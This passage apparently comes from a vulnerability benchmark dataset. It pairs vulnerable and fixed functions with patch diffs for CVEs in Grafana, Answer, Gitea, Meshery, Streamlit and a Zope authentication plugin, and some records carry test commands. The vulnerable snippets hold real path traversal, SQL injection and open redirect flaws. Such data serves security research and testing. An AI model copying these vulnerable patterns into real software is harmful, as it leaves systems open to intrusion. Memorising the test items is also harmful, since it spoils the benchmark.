{\n\t\tc.Resp.Header().Set(\"Cache-Control\", \"max-age=0, must-revalidate, no-cache\")\n\t} else {\n\t\tc.Resp.Header().Set(\"Cache-Control\", \"public, max-age=3600\")\n\t}\n\n\thttp.ServeContent(c.Resp, c.Req, pluginFilePath, fi.ModTime(), f)\n}"}], "fix_func": [{"id": "fix_go_13_1", "commit": "c798c0e", "file_path": "pkg/api/plugins.go", "start_line": 284, "end_line": 344, "snippet": "func (hs *HTTPServer) getPluginAssets(c *models.ReqContext) {\n\tpluginID := web.Params(c.Req)[\":pluginId\"]\n\tplugin, exists := hs.pluginStore.Plugin(c.Req.Context(), pluginID)\n\tif !exists {\n\t\tc.JsonApiErr(404, \"Plugin not found\", nil)\n\t\treturn\n\t}\n\n\t// prepend slash for cleaning relative paths\n\trequestedFile := filepath.Clean(filepath.Join(\"/\", web.Params(c.Req)[\"*\"]))\n\trel, err := filepath.Rel(\"/\", requestedFile)\n\tif err != nil {\n\t\t// slash is prepended above therefore this is not expected to fail\n\t\tc.JsonApiErr(500, \"Failed to get the relative path\", err)\n\t\treturn\n\t}\n\n\tif !plugin.IncludedInSignature(rel) {\n\t\ths.log.Warn(\"Access to requested plugin file will be forbidden in upcoming Grafana versions as the file \"+\n\t\t\t\"is not included in the plugin signature\", \"file\", requestedFile)\n\t}\n\n\tabsPluginDir, err := filepath.Abs(plugin.PluginDir)\n\tif err != nil {\n\t\tc.JsonApiErr(500, \"Failed to get plugin absolute path\", nil)\n\t\treturn\n\t}\n\n\tpluginFilePath := filepath.Join(absPluginDir, rel)\n\t// It's safe to ignore gosec warning G304 since we already clean the requested file path and subsequently\n\t// use this with a prefix of the plugin's directory, which is set during plugin loading\n\t// nolint:gosec\n\tf, err := os.Open(pluginFilePath)\n\tif err != nil {\n\t\tif os.IsNotExist(err) {\n\t\t\tc.JsonApiErr(404, \"Plugin file not found\", err)\n\t\t\treturn\n\t\t}\n\t\tc.JsonApiErr(500, \"Could not open plugin file\", err)\n\t\treturn\n\t}\n\tdefer func() {\n\t\tif err := f.Close(); err != nil {\n\t\t\ths.log.Error(\"Failed to close file\", \"err\", err)\n\t\t}\n\t}()\n\n\tfi, err := f.Stat()\n\tif err != nil {\n\t\tc.JsonApiErr(500, \"Plugin file exists but could not open\", err)\n\t\treturn\n\t}\n\n\tif hs.Cfg.Env == setting.Dev {\n\t\tc.Resp.Header().Set(\"Cache-Control\", \"max-age=0, must-revalidate, no-cache\")\n\t} else {\n\t\tc.Resp.Header().Set(\"Cache-Control\", \"public, max-age=3600\")\n\t}\n\n\thttp.ServeContent(c.Resp, c.Req, pluginFilePath, fi.ModTime(), f)\n}"}], "vul_patch": "--- a/pkg/api/plugins.go\n+++ b/pkg/api/plugins.go\n@@ -6,14 +6,27 @@\n \t\treturn\n \t}\n \n-\trequestedFile := filepath.Clean(web.Params(c.Req)[\"*\"])\n-\tpluginFilePath := filepath.Join(plugin.PluginDir, requestedFile)\n+\t// prepend slash for cleaning relative paths\n+\trequestedFile := filepath.Clean(filepath.Join(\"/\", web.Params(c.Req)[\"*\"]))\n+\trel, err := filepath.Rel(\"/\", requestedFile)\n+\tif err != nil {\n+\t\t// slash is prepended above therefore this is not expected to fail\n+\t\tc.JsonApiErr(500, \"Failed to get the relative path\", err)\n+\t\treturn\n+\t}\n \n-\tif !plugin.IncludedInSignature(requestedFile) {\n+\tif !plugin.IncludedInSignature(rel) {\n \t\ths.log.Warn(\"Access to requested plugin file will be forbidden in upcoming Grafana versions as the file \"+\n \t\t\t\"is not included in the plugin signature\", \"file\", requestedFile)\n \t}\n \n+\tabsPluginDir, err := filepath.Abs(plugin.PluginDir)\n+\tif err != nil {\n+\t\tc.JsonApiErr(500, \"Failed to get plugin absolute path\", nil)\n+\t\treturn\n+\t}\n+\n+\tpluginFilePath := filepath.Join(absPluginDir, rel)\n \t// It's safe to ignore gosec warning G304 since we already clean the requested file path and subsequently\n \t// use this with a prefix of the plugin's directory, which is set during plugin loading\n \t// nolint:gosec\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-43798:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/grafana\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^Test_GetPluginAssets$ github.com/grafana/grafana/pkg/api\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-43798:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/grafana\ngit apply --whitespace=nowarn /workspace/fix.patch\ngo test -timeout 30s -run '^(Test_GetPluginAssets)$' github.com/grafana/grafana/pkg/api\n"} {"cve_id": "CVE-2023-1543", "cve_description": "Insufficient Session Expiration in GitHub repository answerdev/answer prior to 1.0.6.", "cwe_info": {"CWE-613": {"name": "Insufficient Session Expiration", "description": "According to WASC, \"Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization.\""}}, "repo": "https://github.com/answerdev/answer", "patch_url": ["https://github.com/answerdev/answer/commit/cd742b75605c99776f32d271c0a60e0f468e181c"], "programing_language": "Go", "vul_func": [{"id": "vul_go_251_1", "commit": "1de3ec27e50ba7389c9449c59e8ea3a37a908ee4", "file_path": "internal/controller/user_controller.go", "start_line": 199, "end_line": 207, "snippet": "func (uc *UserController) UserLogout(ctx *gin.Context) {\n\taccessToken := middleware.ExtractToken(ctx)\n\tif len(accessToken) == 0 {\n\t\thandler.HandleResponse(ctx, nil, nil)\n\t\treturn\n\t}\n\t_ = uc.authService.RemoveUserCacheInfo(ctx, accessToken)\n\thandler.HandleResponse(ctx, nil, nil)\n}"}], "fix_func": [{"id": "fix_go_251_1", "commit": "cd742b75605c99776f32d271c0a60e0f468e181c", "file_path": "internal/controller/user_controller.go", "start_line": 199, "end_line": 208, "snippet": "func (uc *UserController) UserLogout(ctx *gin.Context) {\n\taccessToken := middleware.ExtractToken(ctx)\n\tif len(accessToken) == 0 {\n\t\thandler.HandleResponse(ctx, nil, nil)\n\t\treturn\n\t}\n\t_ = uc.authService.RemoveUserCacheInfo(ctx, accessToken)\n\t_ = uc.authService.RemoveAdminUserCacheInfo(ctx, accessToken)\n\thandler.HandleResponse(ctx, nil, nil)\n}"}], "vul_patch": "--- a/internal/controller/user_controller.go\n+++ b/internal/controller/user_controller.go\n@@ -5,5 +5,6 @@\n \t\treturn\n \t}\n \t_ = uc.authService.RemoveUserCacheInfo(ctx, accessToken)\n+\t_ = uc.authService.RemoveAdminUserCacheInfo(ctx, accessToken)\n \thandler.HandleResponse(ctx, nil, nil)\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-45325", "cve_description": "Server Side Request Forgery (SSRF) vulneraility exists in Gitea before 1.7.0 using the OpenID URL.", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/go-gitea/gitea", "patch_url": ["https://github.com/go-gitea/gitea/commit/e9c4609410e9c0a77b257f6bd0e6e0a1c038cbde"], "programing_language": "Go", "vul_func": [{"id": "vul_go_242_1", "commit": "176a6048b4ce43b3f9384083c2ab299aac1fa83a", "file_path": "routers/user/auth_openid.go", "start_line": 90, "end_line": 120, "snippet": "func SignInOpenIDPost(ctx *context.Context, form auth.SignInOpenIDForm) {\n\tctx.Data[\"Title\"] = ctx.Tr(\"sign_in\")\n\tctx.Data[\"PageIsSignIn\"] = true\n\tctx.Data[\"PageIsLoginOpenID\"] = true\n\n\tif ctx.HasError() {\n\t\tctx.HTML(200, tplSignInOpenID)\n\t\treturn\n\t}\n\n\tid, err := openid.Normalize(form.Openid)\n\tif err != nil {\n\t\tctx.RenderWithErr(err.Error(), tplSignInOpenID, &form)\n\t\treturn\n\t}\n\tform.Openid = id\n\n\tlog.Trace(\"OpenID uri: \" + id)\n\n\terr = allowedOpenIDURI(id)\n\tif err != nil {\n\t\tctx.RenderWithErr(err.Error(), tplSignInOpenID, &form)\n\t\treturn\n\t}\n\n\tredirectTo := setting.AppURL + \"user/login/openid\"\n\turl, err := openid.RedirectURL(id, redirectTo, setting.AppURL)\n\tif err != nil {\n\t\tctx.RenderWithErr(err.Error(), tplSignInOpenID, &form)\n\t\treturn\n\t}"}], "fix_func": [{"id": "fix_go_242_1", "commit": "e9c4609410e9c0a77b257f6bd0e6e0a1c038cbde", "file_path": "routers/user/auth_openid.go", "start_line": 90, "end_line": 121, "snippet": "func SignInOpenIDPost(ctx *context.Context, form auth.SignInOpenIDForm) {\n\tctx.Data[\"Title\"] = ctx.Tr(\"sign_in\")\n\tctx.Data[\"PageIsSignIn\"] = true\n\tctx.Data[\"PageIsLoginOpenID\"] = true\n\n\tif ctx.HasError() {\n\t\tctx.HTML(200, tplSignInOpenID)\n\t\treturn\n\t}\n\n\tid, err := openid.Normalize(form.Openid)\n\tif err != nil {\n\t\tctx.RenderWithErr(err.Error(), tplSignInOpenID, &form)\n\t\treturn\n\t}\n\tform.Openid = id\n\n\tlog.Trace(\"OpenID uri: \" + id)\n\n\terr = allowedOpenIDURI(id)\n\tif err != nil {\n\t\tctx.RenderWithErr(err.Error(), tplSignInOpenID, &form)\n\t\treturn\n\t}\n\n\tredirectTo := setting.AppURL + \"user/login/openid\"\n\turl, err := openid.RedirectURL(id, redirectTo, setting.AppURL)\n\tif err != nil {\n\t\tlog.Error(1, \"Error in OpenID redirect URL: %s, %v\", redirectTo, err.Error())\n\t\tctx.RenderWithErr(fmt.Sprintf(\"Unable to find OpenID provider in %s\", redirectTo), tplSignInOpenID, &form)\n\t\treturn\n\t}"}], "vul_patch": "--- a/routers/user/auth_openid.go\n+++ b/routers/user/auth_openid.go\n@@ -26,6 +26,7 @@\n \tredirectTo := setting.AppURL + \"user/login/openid\"\n \turl, err := openid.RedirectURL(id, redirectTo, setting.AppURL)\n \tif err != nil {\n-\t\tctx.RenderWithErr(err.Error(), tplSignInOpenID, &form)\n+\t\tlog.Error(1, \"Error in OpenID redirect URL: %s, %v\", redirectTo, err.Error())\n+\t\tctx.RenderWithErr(fmt.Sprintf(\"Unable to find OpenID provider in %s\", redirectTo), tplSignInOpenID, &form)\n \t\treturn\n \t}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-35182", "cve_description": "Meshery is an open source, cloud native manager that enables the design and management of Kubernetes-based infrastructure and applications. A SQL injection vulnerability in Meshery prior to version 0.7.22 may lead to arbitrary file write by using a SQL injection stacked queries payload, and the ATTACH DATABASE command. Additionally, attackers may be able to access and modify any data stored in the database, like performance profiles (which may contain session cookies), Meshery application data, or any Kubernetes configuration added to the system. The Meshery project exposes the function `GetAllEvents` at the API URL `/api/v2/events`. The sort query parameter read in `events_streamer.go` is directly used to build a SQL query in `events_persister.go`. Version 0.7.22 fixes this issue by using the `SanitizeOrderInput` function.", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/meshery/meshery", "patch_url": ["https://github.com/meshery/meshery/commit/b55f6064d0c6a965aee38f30281f99da7dc4420c"], "programing_language": "Go", "vul_func": [{"id": "vul_go_228_1", "commit": "c54bc36", "file_path": "mesheryctl/pkg/utils/helpers.go", "start_line": 544, "end_line": 551, "snippet": "func ClearLine() {\n\tclearCmd := exec.Command(\"clear\") // for UNIX-like systems\n\tif runtime.GOOS == \"windows\" {\n\t\tclearCmd = exec.Command(\"cmd\", \"/c\", \"cls\") // for Windows\n\t}\n\tclearCmd.Stdout = os.Stdout\n\t_ = clearCmd.Run()\n}"}, {"id": "vul_go_228_2", "commit": "c54bc36", "file_path": "server/handlers/meshsync_handler.go", "start_line": 187, "end_line": 262, "snippet": "func (h *Handler) GetMeshSyncResourcesKinds(rw http.ResponseWriter, r *http.Request, _ *models.Preference, _ *models.User, provider models.Provider) {\n\trw.Header().Set(\"Content-Type\", \"application/json\")\n\tenc := json.NewEncoder(rw)\n\n\tpage, offset, limit,\n\t\tsearch, order, sort, _ := getPaginationParams(r)\n\n\tfilter := struct {\n\t\tClusterIds []string `json:\"clusterIds\"`\n\t}{}\n\n\tvar kinds []string\n\tvar totalCount int64\n\n\tclusterIds := r.URL.Query().Get(\"clusterIds\")\n\tif clusterIds != \"\" {\n\t\terr := json.Unmarshal([]byte(clusterIds), &filter.ClusterIds)\n\t\tif err != nil {\n\t\t\th.log.Error(ErrFetchMeshSyncResources(err))\n\t\t\thttp.Error(rw, ErrFetchMeshSyncResources(err).Error(), http.StatusInternalServerError)\n\t\t\treturn\n\t\t}\n\t} else {\n\t\tfilter.ClusterIds = []string{}\n\t}\n\n\tresult := provider.GetGenericPersister().Model(&model.KubernetesResource{}).Distinct(\"kind\").\n\t\tWhere(\"kubernetes_resources.cluster_id IN (?)\", filter.ClusterIds)\n\n\tif search != \"\" {\n\t\tresult = result.Where(\"kubernetes_resources.kind LIKE ?\", \"%\"+search+\"%\")\n\t}\n\n\tif limit != 0 {\n\t\tresult = result.Limit(limit)\n\t}\n\n\tif offset != 0 {\n\t\tresult = result.Offset(offset)\n\t}\n\n\tif order != \"\" {\n\t\tif sort == \"desc\" {\n\t\t\tresult = result.Order(clause.OrderByColumn{Column: clause.Column{Name: order}, Desc: true})\n\t\t} else {\n\t\t\tresult = result.Order(order)\n\t\t}\n\t}\n\n\terr := result.Pluck(\"kinds\", &kinds).Error\n\tif err != nil {\n\t\th.log.Error(ErrFetchMeshSyncResources(err))\n\t\thttp.Error(rw, ErrFetchMeshSyncResources(err).Error(), http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tresponse := &models.MeshSyncResourcesKindsAPIResponse{\n\t\tKinds: kinds,\n\t\tTotalCount: totalCount,\n\t\tPage: page,\n\t\tPageSize: limit,\n\t}\n\n\tif err := enc.Encode(response); err != nil {\n\t\th.log.Error(ErrFetchMeshSyncResources(err))\n\t\thttp.Error(rw, ErrFetchMeshSyncResources(err).Error(), http.StatusInternalServerError)\n\t}\n}\nfunc (h *Handler) DeleteMeshSyncResource(rw http.ResponseWriter, r *http.Request, _ *models.Preference, _ *models.User, provider models.Provider) {\n\tresourceID := mux.Vars(r)[\"id\"]\n\tdb := provider.GetGenericPersister()\n\terr := db.Model(&model.KubernetesResource{}).Delete(&model.KubernetesResource{ID: resourceID}).Error\n\tif err != nil {\n\t\th.log.Error(models.ErrDelete(err, \"meshsync data\", http.StatusInternalServerError))\n\t}\n}"}, {"id": "vul_go_228_3", "commit": "c54bc36", "file_path": "server/models/events_persister.go", "start_line": 47, "end_line": 105, "snippet": "func (e *EventsPersister) GetAllEvents(eventsFilter *events.EventsFilter, userID uuid.UUID) (*EventsResponse, error) {\n\teventsDB := []*events.Event{}\n\tfinder := e.DB.Model(&events.Event{}).Where(\"user_id = ?\", userID)\n\n\tif len(eventsFilter.Category) != 0 {\n\t\tfinder = finder.Where(\"category IN ?\", eventsFilter.Category)\n\t}\n\n\tif len(eventsFilter.Action) != 0 {\n\t\tfinder = finder.Where(\"action IN ?\", eventsFilter.Action)\n\t}\n\n\tif len(eventsFilter.Severity) != 0 {\n\t\tfinder = finder.Where(\"severity IN ?\", eventsFilter.Severity)\n\t}\n\n\tif eventsFilter.Search != \"\" {\n\t\tfinder = finder.Where(\"description LIKE ?\", \"%\"+eventsFilter.Search+\"%\")\n\t}\n\n\tif eventsFilter.Status != \"\" {\n\t\tfinder = finder.Where(\"status = ?\", eventsFilter.Status)\n\t}\n\n\tif eventsFilter.Order == \"asc\" {\n\t\tfinder = finder.Order(eventsFilter.SortOn)\n\t} else {\n\t\tfinder = finder.Order(clause.OrderByColumn{Column: clause.Column{Name: eventsFilter.SortOn}, Desc: true})\n\t}\n\n\tvar count int64\n\tfinder.Count(&count)\n\n\tif eventsFilter.Offset != 0 {\n\t\tfinder = finder.Offset(eventsFilter.Offset)\n\t}\n\n\tif eventsFilter.Limit != 0 {\n\t\tfinder = finder.Limit(eventsFilter.Limit)\n\t}\n\n\terr := finder.Scan(&eventsDB).Error\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tcountBySeverity, err := e.getCountBySeverity(userID, eventsFilter.Status)\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &EventsResponse{\n\t\tEvents: eventsDB,\n\t\tPageSize: eventsFilter.Limit,\n\t\tTotalCount: count,\n\t\tCountBySeverityLevel: countBySeverity,\n\t}, nil\n}"}], "fix_func": [{"id": "fix_go_228_1", "commit": "b55f6064d0c6a965aee38f30281f99da7dc4420c", "file_path": "mesheryctl/pkg/utils/helpers.go", "start_line": 544, "end_line": 554, "snippet": "func ClearLine() {\n\tclearCmd := exec.Command(\"clear\") // for UNIX-like systems\n\tif runtime.GOOS == \"windows\" {\n\t\tclearCmd = exec.Command(\"cmd\", \"/c\", \"cls\") // for Windows\n\t}\n\tclearCmd.Stdout = os.Stdout\n\terr := clearCmd.Run()\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n}"}, {"id": "fix_go_228_2", "commit": "b55f6064d0c6a965aee38f30281f99da7dc4420c", "file_path": "server/handlers/meshsync_handler.go", "start_line": 187, "end_line": 263, "snippet": "func (h *Handler) GetMeshSyncResourcesKinds(rw http.ResponseWriter, r *http.Request, _ *models.Preference, _ *models.User, provider models.Provider) {\n\trw.Header().Set(\"Content-Type\", \"application/json\")\n\tenc := json.NewEncoder(rw)\n\n\tpage, offset, limit,\n\t\tsearch, order, sort, _ := getPaginationParams(r)\n\n\tfilter := struct {\n\t\tClusterIds []string `json:\"clusterIds\"`\n\t}{}\n\n\tvar kinds []string\n\tvar totalCount int64\n\n\tclusterIds := r.URL.Query().Get(\"clusterIds\")\n\tif clusterIds != \"\" {\n\t\terr := json.Unmarshal([]byte(clusterIds), &filter.ClusterIds)\n\t\tif err != nil {\n\t\t\th.log.Error(ErrFetchMeshSyncResources(err))\n\t\t\thttp.Error(rw, ErrFetchMeshSyncResources(err).Error(), http.StatusInternalServerError)\n\t\t\treturn\n\t\t}\n\t} else {\n\t\tfilter.ClusterIds = []string{}\n\t}\n\n\tresult := provider.GetGenericPersister().Model(&model.KubernetesResource{}).Distinct(\"kind\").\n\t\tWhere(\"kubernetes_resources.cluster_id IN (?)\", filter.ClusterIds)\n\n\tif search != \"\" {\n\t\tresult = result.Where(\"kubernetes_resources.kind LIKE ?\", \"%\"+search+\"%\")\n\t}\n\n\tif limit != 0 {\n\t\tresult = result.Limit(limit)\n\t}\n\n\tif offset != 0 {\n\t\tresult = result.Offset(offset)\n\t}\n\n\torder = models.SanitizeOrderInput(order, []string{\"created_at\", \"updated_at\", \"name\"})\n\tif order != \"\" {\n\t\tif sort == \"desc\" {\n\t\t\tresult = result.Order(clause.OrderByColumn{Column: clause.Column{Name: order}, Desc: true})\n\t\t} else {\n\t\t\tresult = result.Order(order)\n\t\t}\n\t}\n\n\terr := result.Pluck(\"kinds\", &kinds).Error\n\tif err != nil {\n\t\th.log.Error(ErrFetchMeshSyncResources(err))\n\t\thttp.Error(rw, ErrFetchMeshSyncResources(err).Error(), http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tresponse := &models.MeshSyncResourcesKindsAPIResponse{\n\t\tKinds: kinds,\n\t\tTotalCount: totalCount,\n\t\tPage: page,\n\t\tPageSize: limit,\n\t}\n\n\tif err := enc.Encode(response); err != nil {\n\t\th.log.Error(ErrFetchMeshSyncResources(err))\n\t\thttp.Error(rw, ErrFetchMeshSyncResources(err).Error(), http.StatusInternalServerError)\n\t}\n}\nfunc (h *Handler) DeleteMeshSyncResource(rw http.ResponseWriter, r *http.Request, _ *models.Preference, _ *models.User, provider models.Provider) {\n\tresourceID := mux.Vars(r)[\"id\"]\n\tdb := provider.GetGenericPersister()\n\terr := db.Model(&model.KubernetesResource{}).Delete(&model.KubernetesResource{ID: resourceID}).Error\n\tif err != nil {\n\t\th.log.Error(models.ErrDelete(err, \"meshsync data\", http.StatusInternalServerError))\n\t}\n}"}, {"id": "fix_go_228_3", "commit": "b55f6064d0c6a965aee38f30281f99da7dc4420c", "file_path": "server/models/events_persister.go", "start_line": 47, "end_line": 106, "snippet": "func (e *EventsPersister) GetAllEvents(eventsFilter *events.EventsFilter, userID uuid.UUID) (*EventsResponse, error) {\n\teventsDB := []*events.Event{}\n\tfinder := e.DB.Model(&events.Event{}).Where(\"user_id = ?\", userID)\n\n\tif len(eventsFilter.Category) != 0 {\n\t\tfinder = finder.Where(\"category IN ?\", eventsFilter.Category)\n\t}\n\n\tif len(eventsFilter.Action) != 0 {\n\t\tfinder = finder.Where(\"action IN ?\", eventsFilter.Action)\n\t}\n\n\tif len(eventsFilter.Severity) != 0 {\n\t\tfinder = finder.Where(\"severity IN ?\", eventsFilter.Severity)\n\t}\n\n\tif eventsFilter.Search != \"\" {\n\t\tfinder = finder.Where(\"description LIKE ?\", \"%\"+eventsFilter.Search+\"%\")\n\t}\n\n\tif eventsFilter.Status != \"\" {\n\t\tfinder = finder.Where(\"status = ?\", eventsFilter.Status)\n\t}\n\n\tsortOn := SanitizeOrderInput(eventsFilter.SortOn, []string{\"created_at\", \"updated_at\", \"name\"})\n\tif eventsFilter.Order == \"asc\" {\n\t\tfinder = finder.Order(sortOn)\n\t} else {\n\t\tfinder = finder.Order(clause.OrderByColumn{Column: clause.Column{Name: sortOn}, Desc: true})\n\t}\n\n\tvar count int64\n\tfinder.Count(&count)\n\n\tif eventsFilter.Offset != 0 {\n\t\tfinder = finder.Offset(eventsFilter.Offset)\n\t}\n\n\tif eventsFilter.Limit != 0 {\n\t\tfinder = finder.Limit(eventsFilter.Limit)\n\t}\n\n\terr := finder.Scan(&eventsDB).Error\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tcountBySeverity, err := e.getCountBySeverity(userID, eventsFilter.Status)\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &EventsResponse{\n\t\tEvents: eventsDB,\n\t\tPageSize: eventsFilter.Limit,\n\t\tTotalCount: count,\n\t\tCountBySeverityLevel: countBySeverity,\n\t}, nil\n}"}], "vul_patch": "--- a/mesheryctl/pkg/utils/helpers.go\n+++ b/mesheryctl/pkg/utils/helpers.go\n@@ -4,5 +4,8 @@\n \t\tclearCmd = exec.Command(\"cmd\", \"/c\", \"cls\") // for Windows\n \t}\n \tclearCmd.Stdout = os.Stdout\n-\t_ = clearCmd.Run()\n+\terr := clearCmd.Run()\n+\tif err != nil {\n+\t\tlog.Fatal(err)\n+\t}\n }\n\n--- a/server/handlers/meshsync_handler.go\n+++ b/server/handlers/meshsync_handler.go\n@@ -39,6 +39,7 @@\n \t\tresult = result.Offset(offset)\n \t}\n \n+\torder = models.SanitizeOrderInput(order, []string{\"created_at\", \"updated_at\", \"name\"})\n \tif order != \"\" {\n \t\tif sort == \"desc\" {\n \t\t\tresult = result.Order(clause.OrderByColumn{Column: clause.Column{Name: order}, Desc: true})\n\n--- a/server/models/events_persister.go\n+++ b/server/models/events_persister.go\n@@ -22,10 +22,11 @@\n \t\tfinder = finder.Where(\"status = ?\", eventsFilter.Status)\n \t}\n \n+\tsortOn := SanitizeOrderInput(eventsFilter.SortOn, []string{\"created_at\", \"updated_at\", \"name\"})\n \tif eventsFilter.Order == \"asc\" {\n-\t\tfinder = finder.Order(eventsFilter.SortOn)\n+\t\tfinder = finder.Order(sortOn)\n \t} else {\n-\t\tfinder = finder.Order(clause.OrderByColumn{Column: clause.Column{Name: eventsFilter.SortOn}, Desc: true})\n+\t\tfinder = finder.Order(clause.OrderByColumn{Column: clause.Column{Name: sortOn}, Desc: true})\n \t}\n \n \tvar count int64\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-42474", "cve_description": "Streamlit is a data oriented application development framework for python. Snowflake Streamlit open source addressed a security vulnerability via the static file sharing feature. Users of hosted Streamlit app(s) on Windows were vulnerable to a path traversal vulnerability when the static file sharing feature is enabled. An attacker could utilize the vulnerability to leak the password hash of the Windows user running Streamlit. The vulnerability was patched on Jul 25, 2024, as part of Streamlit open source version 1.37.0. The vulnerability only affects Windows.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/streamlit/streamlit", "patch_url": ["https://github.com/streamlit/streamlit/commit/3a639859cfdfba2187c81897d44a3e33825eb0a3"], "programing_language": "Python", "vul_func": [{"id": "vul_py_141_1", "commit": "40303e1", "file_path": "lib/streamlit/web/server/app_static_file_handler.py", "start_line": 37, "end_line": 67, "snippet": "class AppStaticFileHandler(tornado.web.StaticFileHandler):\n def initialize(self, path: str, default_filename: str | None = None) -> None:\n super().initialize(path, default_filename)\n mimetypes.add_type(\"image/webp\", \".webp\")\n\n def validate_absolute_path(self, root: str, absolute_path: str) -> str | None:\n full_path = os.path.realpath(absolute_path)\n\n if os.path.isdir(full_path):\n # we don't want to serve directories, and serve only files\n raise tornado.web.HTTPError(404)\n\n if os.path.commonpath([full_path, root]) != root:\n # Don't allow misbehaving clients to break out of the static files directory\n _LOGGER.warning(\n \"Serving files outside of the static directory is not supported\"\n )\n raise tornado.web.HTTPError(404)\n\n if (\n os.path.exists(full_path)\n and os.path.getsize(full_path) > MAX_APP_STATIC_FILE_SIZE\n ):\n raise tornado.web.HTTPError(\n 404,\n \"File is too large, its size should not exceed \"\n f\"{MAX_APP_STATIC_FILE_SIZE} bytes\",\n reason=\"File is too large\",\n )\n\n return super().validate_absolute_path(root, absolute_path)"}], "fix_func": [{"id": "fix_py_141_1", "commit": "3a63985", "file_path": "lib/streamlit/web/server/app_static_file_handler.py", "start_line": 37, "end_line": 69, "snippet": "class AppStaticFileHandler(tornado.web.StaticFileHandler):\n def initialize(self, path: str, default_filename: str | None = None) -> None:\n super().initialize(path, default_filename)\n mimetypes.add_type(\"image/webp\", \".webp\")\n\n def validate_absolute_path(self, root: str, absolute_path: str) -> str | None:\n full_path = os.path.realpath(absolute_path)\n\n ret_val = super().validate_absolute_path(root, absolute_path)\n\n if os.path.isdir(full_path):\n # we don't want to serve directories, and serve only files\n raise tornado.web.HTTPError(404)\n\n if os.path.commonpath([full_path, root]) != root:\n # Don't allow misbehaving clients to break out of the static files directory\n _LOGGER.warning(\n \"Serving files outside of the static directory is not supported\"\n )\n raise tornado.web.HTTPError(404)\n\n if (\n os.path.exists(full_path)\n and os.path.getsize(full_path) > MAX_APP_STATIC_FILE_SIZE\n ):\n raise tornado.web.HTTPError(\n 404,\n \"File is too large, its size should not exceed \"\n f\"{MAX_APP_STATIC_FILE_SIZE} bytes\",\n reason=\"File is too large\",\n )\n\n return ret_val"}], "vul_patch": "--- a/lib/streamlit/web/server/app_static_file_handler.py\n+++ b/lib/streamlit/web/server/app_static_file_handler.py\n@@ -5,6 +5,8 @@\n \n def validate_absolute_path(self, root: str, absolute_path: str) -> str | None:\n full_path = os.path.realpath(absolute_path)\n+\n+ ret_val = super().validate_absolute_path(root, absolute_path)\n \n if os.path.isdir(full_path):\n # we don't want to serve directories, and serve only files\n@@ -28,4 +30,4 @@\n reason=\"File is too large\",\n )\n \n- return super().validate_absolute_path(root, absolute_path)\n+ return ret_val\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-21337", "cve_description": "Products.PluggableAuthService is a pluggable Zope authentication and authorization framework. In Products.PluggableAuthService before version 2.6.0 there is an open redirect vulnerability. A maliciously crafted link to the login form and login functionality could redirect the browser to a different website. The problem has been fixed in version 2.6.1. Depending on how you have installed Products.PluggableAuthService, you should change the buildout version pin to `2.6.1` and re-run the buildout, or if you used `pip` simply do `pip install \"Products.PluggableAuthService>=2.6.1\".", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/zopefoundation/Products.PluggableAuthService", "patch_url": ["https://github.com/zopefoundation/Products.PluggableAuthService/commit/7eead067898852ebd3e0f143bc51295928528dfa"], "programing_language": "Python", "vul_func": [{"id": "vul_py_368_1", "commit": "c49ddb0f2770cab57f76475f4571e8e842181b87", "file_path": "src/Products/PluggableAuthService/plugins/CookieAuthHelper.py", "start_line": 194, "end_line": 239, "snippet": " def unauthorized(self):\n req = self.REQUEST\n resp = req['RESPONSE']\n\n # If we set the auth cookie before, delete it now.\n if self.cookie_name in resp.cookies:\n del resp.cookies[self.cookie_name]\n\n # Redirect if desired.\n url = self.getLoginURL()\n if url is not None:\n came_from = req.get('came_from', None)\n\n if came_from is None:\n came_from = req.get('ACTUAL_URL', '')\n query = req.get('QUERY_STRING')\n if query:\n if not query.startswith('?'):\n query = '?' + query\n came_from = came_from + query\n else:\n # If came_from contains a value it means the user\n # must be coming through here a second time\n # Reasons could be typos when providing credentials\n # or a redirect loop (see below)\n req_url = req.get('ACTUAL_URL', '')\n\n if req_url and req_url == url:\n # Oops... The login_form cannot be reached by the user -\n # it might be protected itself due to misconfiguration -\n # the only sane thing to do is to give up because we are\n # in an endless redirect loop.\n return 0\n\n if '?' in url:\n sep = '&'\n else:\n sep = '?'\n url = '%s%scame_from=%s' % 